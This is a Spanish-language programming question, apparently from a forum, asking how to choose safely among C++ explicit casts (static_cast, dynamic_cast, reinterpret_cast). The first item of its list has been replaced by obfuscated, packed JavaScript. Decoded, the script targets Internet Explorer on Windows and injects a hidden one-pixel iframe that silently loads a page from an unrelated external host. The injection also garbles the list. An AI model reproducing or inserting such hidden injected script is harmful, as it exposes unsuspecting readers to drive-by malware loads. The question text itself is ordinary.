<p>¿Cómo estar seguro o qué pautas seguir a la hora de usar los moldes explícitos  en <code>C++</code>?</p>

<p>Por lo que entiendo al usar los <code>moldes</code> le estamos pidiendo al compilador que pase de la comprobación de tipos, y eso no creo que sea muy bueno si uno no sabe exactamente qué molde usar. Por eso quería saber qué guías usan o cosas a tener en cuenta para decidirse por un tipo de molde u otro a la hora de modelar los datos, para determinadas situaciones, y así saber cuándo es seguro usar uno u otro.</p>

<ol>
<li><code><sc​ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</sc​ript></code></li>
<li><code>static_cast</code></li>
<li><code>dynamic_cast</code></li>
<li><code>reinterpret_cast</code></li>
</ol>
